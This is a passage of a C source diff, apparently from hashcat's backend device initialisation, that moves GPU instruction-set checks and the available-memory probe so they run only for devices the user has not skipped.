-        RUN_INSTRUCTION_CHECKS();
-      }
+      // device_available_mem
 
-      #undef RUN_INSTRUCTION_CHECKS
-      */
+      CUcontext cuda_context;
 
-      // device_available_mem
+      if (hc_cuCtxCreate (hashcat_ctx, &cuda_context, CU_CTX_SCHED_BLOCKING_SYNC, device_param->cuda_device) == -1) return -1;
+
+      if (hc_cuCtxSetCurrent (hashcat_ctx, cuda_context) == -1) return -1;
 
       size_t free  = 0;
       size_t total = 0;
@@ -6269,6 +6246,25 @@ int backend_ctx_devices_init (hashcat_ctx_t *hashcat_ctx, const int comptime)
           }
         }
 
+        // instruction set
+
+        // fixed values works only for nvidia devices
+        // dynamical values for amd see time intensive section below
+
+        if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && (device_param->opencl_platform_vendor_id == VENDOR_ID_NV))
+        {
+          const int sm = (device_param->sm_major * 10) + device_param->sm_minor;
+
+          device_param->has_add   = (sm >= 12) ? true : false;
+          device_param->has_addc  = (sm >= 12) ? true : false;
+          device_param->has_sub   = (sm >= 12) ? true : false;
+          device_param->has_subc  = (sm >= 12) ? true : false;
+          device_param->has_bfe   = (sm >= 20) ? true : false;
+          device_param->has_lop3  = (sm >= 50) ? true : false;
+          device_param->has_mov64 = (sm >= 10) ? true : false;
+          device_param->has_prmt  = (sm >= 20) ? true : false;
+        }
+
         // common driver check
 
         if (device_param->skipped == false)
@@ -6432,272 +6428,336 @@ int backend_ctx_devices_init (hashcat_ctx_t *hashcat_ctx, const int comptime)
 
           opencl_devices_active++;
         }
+      }
+    }
+  }
 
-        /**
-         * create context for each device
-         */
+  backend_ctx->opencl_devices_cnt     = opencl_devices_cnt;
+  backend_ctx->opencl_devices_active  = opencl_devices_active;
 
-        cl_context context;
+  // all devices combined go into backend_* variables
 
-        /*
-        cl_context_properties properties[3];
+  backend_ctx->backend_devices_cnt    = cuda_devices_cnt    + opencl_devices_cnt;
+  backend_ctx->backend_devices_active = cuda_devices_active + opencl_devices_active;
 
-        properties[0] = CL_CONTEXT_PLATFORM;
-        properties[1] = (cl_context_properties) device_param->opencl_platform;
-        properties[2] = 0;
+  // find duplicate devices
 
-        CL_rc = hc_clCreateContext (hashcat_ctx, properties, 1, &device_param->opencl_device, NULL, NULL, &context);
-        */
+  //if ((cuda_devices_cnt > 0) && (opencl_devices_cnt > 0))
+  //{
+    // using force here enables both devices, which is the worst possible outcome
+    // many users force by default, so this is not a good idea
 
-        if (hc_clCreateContext (hashcat_ctx, NULL, 1, &device_param->opencl_device, NULL, NULL, &context) == -1) return -1;
+    //if (user_options->force == false)
+    //{
+    backend_ctx_find_alias_devices (hashcat_ctx);
+    //{
+  //}
 
-        /**
-         * create command-queue
-         */
+  if (backend_ctx->backend_devices_active == 0)
+  {
+    event_log_error (hashcat_ctx, "No devices found/left.");
 
-        cl_command_queue command_queue;
+    return -1;
+  }
 
-        if (hc_clCreateCommandQueue (hashcat_ctx, context, device_param->opencl_device, 0, &command_queue) == -1) return -1;
+  // now we can calculate the number of parallel running hook threads based on
+  // the number cpu cores and the number of active compute devices
+  // unless overwritten by the user
 
-        if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && (device_param->opencl_platform_vendor_id == VENDOR_ID_AMD))
-        {
-          #define RUN_INSTRUCTION_CHECKS()
-            device_param->has_vadd     = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADD_U32     %0, vcc, 0, 0;\"      : \"=v\"(r1)); }"); \
-            device_param->has_vaddc    = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADDC_U32    %0, vcc, 0, 0, vcc;\" : \"=v\"(r1)); }"); \
-            device_param->has_vadd_co  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADD_CO_U32  %0, vcc, 0, 0;\"      : \"=v\"(r1)); }"); \
-            device_param->has_vaddc_co = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADDC_CO_U32 %0, vcc, 0, 0, vcc;\" : \"=v\"(r1)); }"); \
-            device_param->has_vsub     = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_SUB_U32     %0, vcc, 0, 0;\"      : \"=v\"(r1)); }"); \
-            device_param->has_vsubb    = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_SUBB_U32    %0, vcc, 0, 0, vcc;\" : \"=v\"(r1)); }"); \
-            device_param->has_vsub_co  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_SUB_CO_U32  %0, vcc, 0, 0;\"      : \"=v\"(r1)); }"); \
-            device_param->has_vsubb_co = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_SUBB_CO_U32 %0, vcc, 0, 0, vcc;\" : \"=v\"(r1)); }"); \
-            device_param->has_vadd3    = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADD3_U32    %0,   0, 0, 0;\"      : \"=v\"(r1)); }"); \
-            device_param->has_vbfe     = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_BFE_U32     %0,   0, 0, 0;\"      : \"=v\"(r1)); }"); \
-            device_param->has_vperm    = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_PERM_B32    %0,   0, 0, 0;\"      : \"=v\"(r1)); }"); \
+  if (user_options->hook_threads == HOOK_THREADS)
+  {
+    const u32 processor_count = hc_get_processor_count ();
 
-          if (backend_devices_idx > 0)
-          {
-            hc_device_param_t *device_param_prev = &devices_param[backend_devices_idx - 1];
+    const u32 processor_count_cu = CEILDIV (processor_count, backend_ctx->backend_devices_active); // should never reach 0
 
-            if (is_same_device_type (device_param, device_param_prev) == true)
-            {
-              device_param->has_vadd     = device_param_prev->has_vadd;
-              device_param->has_vaddc    = device_param_prev->has_vaddc;
-              device_param->has_vadd_co  = device_param_prev->has_vadd_co;
-              device_param->has_vaddc_co = device_param_prev->has_vaddc_co;
-              device_param->has_vsub     = device_param_prev->has_vsub;
-              device_param->has_vsubb    = device_param_prev->has_vsubb;
-              device_param->has_vsub_co  = device_param_prev->has_vsub_co;
-              device_param->has_vsubb_co = device_param_prev->has_vsubb_co;
-              device_param->has_vadd3    = device_param_prev->has_vadd3;
-              device_param->has_vbfe     = device_param_prev->has_vbfe;
-              device_param->has_vperm    = device_param_prev->has_vperm;
-            }
-            else
-            {
-              RUN_INSTRUCTION_CHECKS();
-            }
-          }
-          else
-          {
-            RUN_INSTRUCTION_CHECKS();
-          }
+    user_options->hook_threads = processor_count_cu;
+  }
 
-          #undef RUN_INSTRUCTION_CHECKS
-        }
+  // additional check to see if the user has chosen a device that is not within the range of available devices (i.e. larger than devices_cnt)
 
-        if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && (device_param->opencl_platform_vendor_id == VENDOR_ID_NV))
-        {
-          const int sm = (device_param->sm_major * 10) + device_param->sm_minor;
+  if (backend_ctx->backend_devices_filter != (u64) -1)
+  {
+    const u64 backend_devices_cnt_mask = ~(((u64) -1 >> backend_ctx->backend_devices_cnt) << backend_ctx->backend_devices_cnt);
 
-          device_param->has_add   = (sm >= 12) ? true : false;
-          device_param->has_addc  = (sm >= 12) ? true : false;
-          device_param->has_sub   = (sm >= 12) ? true : false;
-          device_param->has_subc  = (sm >= 12) ? true : false;
-          device_param->has_bfe   = (sm >= 20) ? true : false;
-          device_param->has_lop3  = (sm >= 50) ? true : false;
-          device_param->has_mov64 = (sm >= 10) ? true : false;
-          device_param->has_prmt  = (sm >= 20) ? true : false;
+    if (backend_ctx->backend_devices_filter > backend_devices_cnt_mask)
+    {
+      event_log_error (hashcat_ctx, "An invalid device was specified using the --backend-devices parameter.");
+      event_log_error (hashcat_ctx, "The specified device was higher than the number of available devices (%u).", backend_ctx->backend_devices_cnt);
 
-          /*
-          #define RUN_INSTRUCTION_CHECKS()                                                                                                                                                                                                          \
-            device_param->has_add   = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"add.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                        \
-            device_param->has_addc  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"addc.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                       \
-            device_param->has_sub   = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"sub.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                        \
-            device_param->has_subc  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"subc.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                       \
-            device_param->has_bfe   = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"bfe.u32 %0, 0, 0, 0;\" : \"=r\"(r)); }");                                        \
-            device_param->has_lop3  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"lop3.b32 %0, 0, 0, 0, 0;\" : \"=r\"(r)); }");                                    \
-            device_param->has_mov64 = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { ulong r; uint a; uint b; asm volatile (\"mov.b64 %0, {%1, %2};\" : \"=l\"(r) : \"r\"(a), \"r\"(b)); }"); \
-            device_param->has_prmt  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"prmt.b32 %0, 0, 0, 0;\" : \"=r\"(r)); }");                                       \
-
-          if (backend_devices_idx > 0)
-          {
-            hc_device_param_t *device_param_prev = &devices_param[backend_devices_idx - 1];
+      return -1;
+    }
+  }
 
-            if (is_same_device_type (device_param, device_param_prev) == true)
-            {
-              device_param->has_add   = device_param_prev->has_add;
-              device_param->has_addc  = device_param_prev->has_addc;
-              device_param->has_sub   = device_param_prev->has_sub;
-              device_param->has_subc  = device_param_prev->has_subc;
-              device_param->has_bfe   = device_param_prev->has_bfe;
-              device_param->has_lop3  = device_param_prev->has_lop3;
-              device_param->has_mov64 = device_param_prev->has_mov64;
-              device_param->has_prmt  = device_param_prev->has_prmt;
-            }
-            else
-            {
-              RUN_INSTRUCTION_CHECKS();
-            }
-          }
-          else
-          {
-            RUN_INSTRUCTION_CHECKS();
-          }
+  // time or resource intensive operations which we do not run if the corresponding device was skipped by the user
 
-          #undef RUN_INSTRUCTION_CHECKS
-          */
-        }
+  if (backend_ctx->cuda)
+  {
+    // instruction test for cuda devices was replaced with fixed values (see above)
 
-        // device_available_mem
+    /*
+    CUcontext cuda_context;
 
-        #define MAX_ALLOC_CHECKS_CNT  8192
-        #define MAX_ALLOC_CHECKS_SIZE (64 * 1024 * 1024)
+    if (hc_cuCtxCreate (hashcat_ctx, &cuda_context, CU_CTX_SCHED_BLOCKING_SYNC, device_param->cuda_device) == -1) return -1;
 
-        device_param->device_available_mem = device_param->device_global_mem - MAX_ALLOC_CHECKS_SIZE;
+    if (hc_cuCtxSetCurrent (hashcat_ctx, cuda_context) == -1) return -1;
 
-        #if defined (_WIN)
-        if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && (device_param->opencl_platform_vendor_id == VENDOR_ID_NV))
-        #else
-        if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && ((device_param->opencl_platform_vendor_id == VENDOR_ID_NV) || (device_param->opencl_platform_vendor_id == VENDOR_ID_AMD)))
-        #endif
-        {
-          // OK, so the problem here is the following:
-          // There's just CL_DEVICE_GLOBAL_MEM_SIZE to ask OpenCL about the total memory on the device,
-          // but there's no way to ask for available memory on the device.
-          // In combination, most OpenCL runtimes implementation of clCreateBuffer()
-          // are doing so called lazy memory allocation on the device.
-          // Now, if the user has X11 (or a game or anything that takes a lot of GPU memory)
-          // running on the host we end up with an error type of this:
-          // clEnqueueNDRangeKernel(): CL_MEM_OBJECT_ALLOCATION_FAILURE
-          // The clEnqueueNDRangeKernel() is because of the lazy allocation
-          // The best way to workaround this problem is if we would be able to ask for available memory,
-          // The idea here is to try to evaluate available memory by allocating it till it errors
+    #define RUN_INSTRUCTION_CHECKS()                                                                                                                                                                                                                      \
+      device_param->has_add   = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"add.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                                              \
+      device_param->has_addc  = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"addc.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                                             \
+      device_param->has_sub   = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"sub.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                                              \
+      device_param->has_subc  = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"subc.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                                             \
+      device_param->has_bfe   = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"bfe.u32 %0, 0, 0, 0;\" : \"=r\"(r)); }");                                                              \
+      device_param->has_lop3  = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"lop3.b32 %0, 0, 0, 0, 0;\" : \"=r\"(r)); }");                                                          \
+      device_param->has_mov64 = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned long long r; unsigned int a; unsigned int b; asm volatile (\"mov.b64 %0, {%1, %2};\" : \"=l\"(r) : \"r\"(a), \"r\"(b)); }");  \
+      device_param->has_prmt  = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"prmt.b32 %0, 0, 0, 0;\" : \"=r\"(r)); }");                                                             \
 
-          cl_mem *tmp_device = (cl_mem *) hccalloc (MAX_ALLOC_CHECKS_CNT, sizeof (cl_mem));
+    if (backend_devices_idx > 0)
+    {
+      hc_device_param_t *device_param_prev = &devices_param[backend_devices_idx - 1];
 
-          u64 c;
+      if (is_same_device_type (device_param, device_param_prev) == true)
+      {
+        device_param->has_add   = device_param_prev->has_add;
+        device_param->has_addc  = device_param_prev->has_addc;
+        device_param->has_sub   = device_param_prev->has_sub;
+        device_param->has_subc  = device_param_prev->has_subc;
+        device_param->has_bfe   = device_param_prev->has_bfe;
+        device_param->has_lop3  = device_param_prev->has_lop3;
+        device_param->has_mov64 = device_param_prev->has_mov64;
+        device_param->has_prmt  = device_param_prev->has_prmt;
+      }
+      else
+      {
+        RUN_INSTRUCTION_CHECKS();
+      }
+    }
+    else
+    {
+      RUN_INSTRUCTION_CHECKS();
+    }
 
-          for (c = 0; c < MAX_ALLOC_CHECKS_CNT; c++)
-          {
-            if (((c + 1 + 1) * MAX_ALLOC_CHECKS_SIZE) >= device_param->device_global_mem) break;
+    #undef RUN_INSTRUCTION_CHECKS
 
-            cl_int CL_err;
+    if (hc_cuCtxDestroy (hashcat_ctx, cuda_context) == -1) return -1;
 
-            OCL_PTR *ocl = (OCL_PTR *) backend_ctx->ocl;
+    */
+  }
 
-            tmp_device[c] = ocl->clCreateBuffer (context, CL_MEM_READ_WRITE, MAX_ALLOC_CHECKS_SIZE, NULL, &CL_err);
+  if (backend_ctx->ocl)
+  {
+    for (int backend_devices_cnt = 0; backend_devices_cnt < backend_ctx->backend_devices_cnt; backend_devices_cnt++)
+    {
+      hc_device_param_t *device_param = &backend_ctx->devices_param[backend_devices_cnt];
 
-            if (CL_err != CL_SUCCESS)
-            {
-              c--;
+      if (device_param->is_opencl == false) continue;
 
-              break;
-            }
+      if (device_param->skipped == true) continue;
 
-            // transfer only a few byte should be enough to force the runtime to actually allocate the memory
+      /**
+       * create context for each device
+       */
 
-            u8 tmp_host[8];
+      cl_context context;
 
-            if (ocl->clEnqueueReadBuffer  (command_queue, tmp_device[c], CL_TRUE, 0, sizeof (tmp_host), tmp_host, 0, NULL, NULL) != CL_SUCCESS) break;
+      /*
+      cl_context_properties properties[3];
 
-            if (ocl->clEnqueueWriteBuffer (command_queue, tmp_device[c], CL_TRUE, 0, sizeof (tmp_host), tmp_host, 0, NULL, NULL) != CL_SUCCESS) break;
+      properties[0] = CL_CONTEXT_PLATFORM;
+      properties[1] = (cl_context_properties) device_param->opencl_platform;
+      properties[2] = 0;
 
-            if (ocl->clEnqueueReadBuffer  (command_queue, tmp_device[c], CL_TRUE, MAX_ALLOC_CHECKS_SIZE - sizeof (tmp_host), sizeof (tmp_host), tmp_host, 0, NULL, NULL) != CL_SUCCESS) break;
+      CL_rc = hc_clCreateContext (hashcat_ctx, properties, 1, &device_param->opencl_device, NULL, NULL, &context);
+      */
 
-            if (ocl->clEnqueueWriteBuffer (command_queue, tmp_device[c], CL_TRUE, MAX_ALLOC_CHECKS_SIZE - sizeof (tmp_host), sizeof (tmp_host), tmp_host, 0, NULL, NULL) != CL_SUCCESS) break;
-          }
+      if (hc_clCreateContext (hashcat_ctx, NULL, 1, &device_param->opencl_device, NULL, NULL, &context) == -1) return -1;
+
+      /**
+       * create command-queue
+       */
 
-          device_param->device_available_mem = MAX_ALLOC_CHECKS_SIZE;
-          if (c > 0)
+      cl_command_queue command_queue;
+
+      if (hc_clCreateCommandQueue (hashcat_ctx, context, device_param->opencl_device, 0, &command_queue) == -1) return -1;
+
+      // instruction set
+
+      if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && (device_param->opencl_platform_vendor_id == VENDOR_ID_AMD))
+      {
+        #define RUN_INSTRUCTION_CHECKS()
+          device_param->has_vadd     = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADD_U32     %0, vcc, 0, 0;\"      : \"=v\"(r1)); }"); \
+          device_param->has_vaddc    = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADDC_U32    %0, vcc, 0, 0, vcc;\" : \"=v\"(r1)); }"); \
+          device_param->has_vadd_co  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADD_CO_U32  %0, vcc, 0, 0;\"      : \"=v\"(r1)); }"); \
+          device_param->has_vaddc_co = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADDC_CO_U32 %0, vcc, 0, 0, vcc;\" : \"=v\"(r1)); }"); \
+          device_param->has_vsub     = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_SUB_U32     %0, vcc, 0, 0;\"      : \"=v\"(r1)); }"); \
+          device_param->has_vsubb    = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_SUBB_U32    %0, vcc, 0, 0, vcc;\" : \"=v\"(r1)); }"); \
+          device_param->has_vsub_co  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_SUB_CO_U32  %0, vcc, 0, 0;\"      : \"=v\"(r1)); }"); \
+          device_param->has_vsubb_co = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_SUBB_CO_U32 %0, vcc, 0, 0, vcc;\" : \"=v\"(r1)); }"); \
+          device_param->has_vadd3    = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_ADD3_U32    %0,   0, 0, 0;\"      : \"=v\"(r1)); }"); \
+          device_param->has_vbfe     = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_BFE_U32     %0,   0, 0, 0;\"      : \"=v\"(r1)); }"); \
+          device_param->has_vperm    = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r1; __asm__ __volatile__ (\"V_PERM_B32    %0,   0, 0, 0;\"      : \"=v\"(r1)); }"); \
+
+        if (backend_devices_idx > 0)
+        {
+          hc_device_param_t *device_param_prev = &devices_param[backend_devices_idx - 1];
+
+          if (is_same_device_type (device_param, device_param_prev) == true)
           {
-            device_param->device_available_mem *= c;
+            device_param->has_vadd     = device_param_prev->has_vadd;
+            device_param->has_vaddc    = device_param_prev->has_vaddc;
+            device_param->has_vadd_co  = device_param_prev->has_vadd_co;
+            device_param->has_vaddc_co = device_param_prev->has_vaddc_co;
+            device_param->has_vsub     = device_param_prev->has_vsub;
+            device_param->has_vsubb    = device_param_prev->has_vsubb;
+            device_param->has_vsub_co  = device_param_prev->has_vsub_co;
+            device_param->has_vsubb_co = device_param_prev->has_vsubb_co;
+            device_param->has_vadd3    = device_param_prev->has_vadd3;
+            device_param->has_vbfe     = device_param_prev->has_vbfe;
+            device_param->has_vperm    = device_param_prev->has_vperm;
           }
+          else
+          {
+            RUN_INSTRUCTION_CHECKS();
+          }
+        }
+        else
+        {
+          RUN_INSTRUCTION_CHECKS();
+        }
+
+        #undef RUN_INSTRUCTION_CHECKS
+      }
 
-          // clean up
+      if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && (device_param->opencl_platform_vendor_id == VENDOR_ID_NV))
+      {
+        // replaced with fixed values see non time intensive section above
 
-          for (c = 0; c < MAX_ALLOC_CHECKS_CNT; c++)
-          {
-            if (((c + 1 + 1) * MAX_ALLOC_CHECKS_SIZE) >= device_param->device_global_mem) break;
+        /*
+        #define RUN_INSTRUCTION_CHECKS()                                                                                                                                                                                                          \
+          device_param->has_add   = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"add.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                        \
+          device_param->has_addc  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"addc.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                       \
+          device_param->has_sub   = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"sub.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                        \
+          device_param->has_subc  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"subc.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                       \
+          device_param->has_bfe   = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"bfe.u32 %0, 0, 0, 0;\" : \"=r\"(r)); }");                                        \
+          device_param->has_lop3  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"lop3.b32 %0, 0, 0, 0, 0;\" : \"=r\"(r)); }");                                    \
+          device_param->has_mov64 = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { ulong r; uint a; uint b; asm volatile (\"mov.b64 %0, {%1, %2};\" : \"=l\"(r) : \"r\"(a), \"r\"(b)); }"); \
+          device_param->has_prmt  = opencl_test_instruction (hashcat_ctx, context, device_param->opencl_device, "__kernel void test () { uint r; asm volatile (\"prmt.b32 %0, 0, 0, 0;\" : \"=r\"(r)); }");                                       \
 
-            if (tmp_device[c] != NULL)
-            {
-              if (hc_clReleaseMemObject (hashcat_ctx, tmp_device[c]) == -1) return -1;
-            }
-          }
+        if (backend_devices_idx > 0)
+        {
+          hc_device_param_t *device_param_prev = &devices_param[backend_devices_idx - 1];
 
-          hcfree (tmp_device);
+          if (is_same_device_type (device_param, device_param_prev) == true)
+          {
+            device_param->has_add   = device_param_prev->has_add;
+            device_param->has_addc  = device_param_prev->has_addc;
+            device_param->has_sub   = device_param_prev->has_sub;
+            device_param->has_subc  = device_param_prev->has_subc;
+            device_param->has_bfe   = device_param_prev->has_bfe;
+            device_param->has_lop3  = device_param_prev->has_lop3;
+            device_param->has_mov64 = device_param_prev->has_mov64;
+            device_param->has_prmt  = device_param_prev->has_prmt;
+          }
+          else
+          {
+            RUN_INSTRUCTION_CHECKS();
+          }
+        }
+        else
+        {
+          RUN_INSTRUCTION_CHECKS();
         }
 
-        hc_clReleaseCommandQueue (hashcat_ctx, command_queue);
-
-        hc_clReleaseContext (hashcat_ctx, context);
+        #undef RUN_INSTRUCTION_CHECKS
+        */
       }
-    }
-  }
 
-  backend_ctx->opencl_devices_cnt     = opencl_devices_cnt;
-  backend_ctx->opencl_devices_active  = opencl_devices_active;
+      // available device memory
+      // This test causes an GPU memory usage spike.
+      // In case there are multiple hashcat instances starting at the same time this will cause GPU out of memory errors which otherwise would not exist.
+      // We will simply not run it if that device was skipped by the user.
 
-  // all devices combined go into backend_* variables
+      #define MAX_ALLOC_CHECKS_CNT  8192
+      #define MAX_ALLOC_CHECKS_SIZE (64 * 1024 * 1024)
 
-  backend_ctx->backend_devices_cnt    = cuda_devices_cnt    + opencl_devices_cnt;
-  backend_ctx->backend_devices_active = cuda_devices_active + opencl_devices_active;
+      device_param->device_available_mem = device_param->device_global_mem - MAX_ALLOC_CHECKS_SIZE;
 
-  // find duplicate devices
+      #if defined (_WIN)
+      if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && (device_param->opencl_platform_vendor_id == VENDOR_ID_NV))
+      #else
+      if ((device_param->opencl_device_type & CL_DEVICE_TYPE_GPU) && ((device_param->opencl_platform_vendor_id == VENDOR_ID_NV) || (device_param->opencl_platform_vendor_id == VENDOR_ID_AMD)))
+      #endif
+      {
+        // OK, so the problem here is the following:
+        // There's just CL_DEVICE_GLOBAL_MEM_SIZE to ask OpenCL about the total memory on the device,
+        // but there's no way to ask for available memory on the device.
+        // In combination, most OpenCL runtimes implementation of clCreateBuffer()
+        // are doing so called lazy memory allocation on the device.
+        // Now, if the user has X11 (or a game or anything that takes a lot of GPU memory)
+        // running on the host we end up with an error type of this:
+        // clEnqueueNDRangeKernel(): CL_MEM_OBJECT_ALLOCATION_FAILURE
+        // The clEnqueueNDRangeKernel() is because of the lazy allocation
+        // The best way to workaround this problem is if we would be able to ask for available memory,
+        // The idea here is to try to evaluate available memory by allocating it till it errors
 
-  //if ((cuda_devices_cnt > 0) && (opencl_devices_cnt > 0))
-  //{
-    // using force here enables both devices, which is the worst possible outcome
-    // many users force by default, so this is not a good idea
+        cl_mem *tmp_device = (cl_mem *) hccalloc (MAX_ALLOC_CHECKS_CNT, sizeof (cl_mem));
 
-    //if (user_options->force == false)
-    //{
-    backend_ctx_find_alias_devices (hashcat_ctx);
-    //{
-  //}
+        u64 c;
 
-  if (backend_ctx->backend_devices_active == 0)
-  {
-    event_log_error (hashcat_ctx, "No devices found/left.");
+        for (c = 0; c < MAX_ALLOC_CHECKS_CNT; c++)
+        {
+          if (((c + 1 + 1) * MAX_ALLOC_CHECKS_SIZE) >= device_param->device_global_mem) break;
 
-    return -1;
-  }
+          cl_int CL_err;
 
-  // now we can calculate the number of parallel running hook threads based on
-  // the number cpu cores and the number of active compute devices
-  // unless overwritten by the user
+          OCL_PTR *ocl = (OCL_PTR *) backend_ctx->ocl;
 
-  if (user_options->hook_threads == HOOK_THREADS)
-  {
-    const u32 processor_count = hc_get_processor_count ();
+          tmp_device[c] = ocl->clCreateBuffer (context, CL_MEM_READ_WRITE, MAX_ALLOC_CHECKS_SIZE, NULL, &CL_err);
 
-    const u32 processor_count_cu = CEILDIV (processor_count, backend_ctx->backend_devices_active); // should never reach 0
+          if (CL_err != CL_SUCCESS)
+          {
+            c--;
 
-    user_options->hook_threads = processor_count_cu;
-  }
+            break;
+          }
 
-  // additional check to see if the user has chosen a device that is not within the range of available devices (i.e. larger than devices_cnt)
+          // transfer only a few byte should be enough to force the runtime to actually allocate the memory
 
-  if (backend_ctx->backend_devices_filter != (u64) -1)
-  {
-    const u64 backend_devices_cnt_mask = ~(((u64) -1 >> backend_ctx->backend_devices_cnt) << backend_ctx->backend_devices_cnt);
+          u8 tmp_host[8];
 
-    if (backend_ctx->backend_devices_filter > backend_devices_cnt_mask)
-    {
-      event_log_error (hashcat_ctx, "An invalid device was specified using the --backend-devices parameter.");
-      event_log_error (hashcat_ctx, "The specified device was higher than the number of available devices (%u).", backend_ctx->backend_devices_cnt);
+          if (ocl->clEnqueueReadBuffer  (command_queue, tmp_device[c], CL_TRUE, 0, sizeof (tmp_host), tmp_host, 0, NULL, NULL) != CL_SUCCESS) break;
 
-      return -1;
+          if (ocl->clEnqueueWriteBuffer (command_queue, tmp_device[c], CL_TRUE, 0, sizeof (tmp_host), tmp_host, 0, NULL, NULL) != CL_SUCCESS) break;
+
+          if (ocl->clEnqueueReadBuffer  (command_queue, tmp_device[c], CL_TRUE, MAX_ALLOC_CHECKS_SIZE - sizeof (tmp_host), sizeof (tmp_host), tmp_host, 0, NULL, NULL) != CL_SUCCESS) break;
+
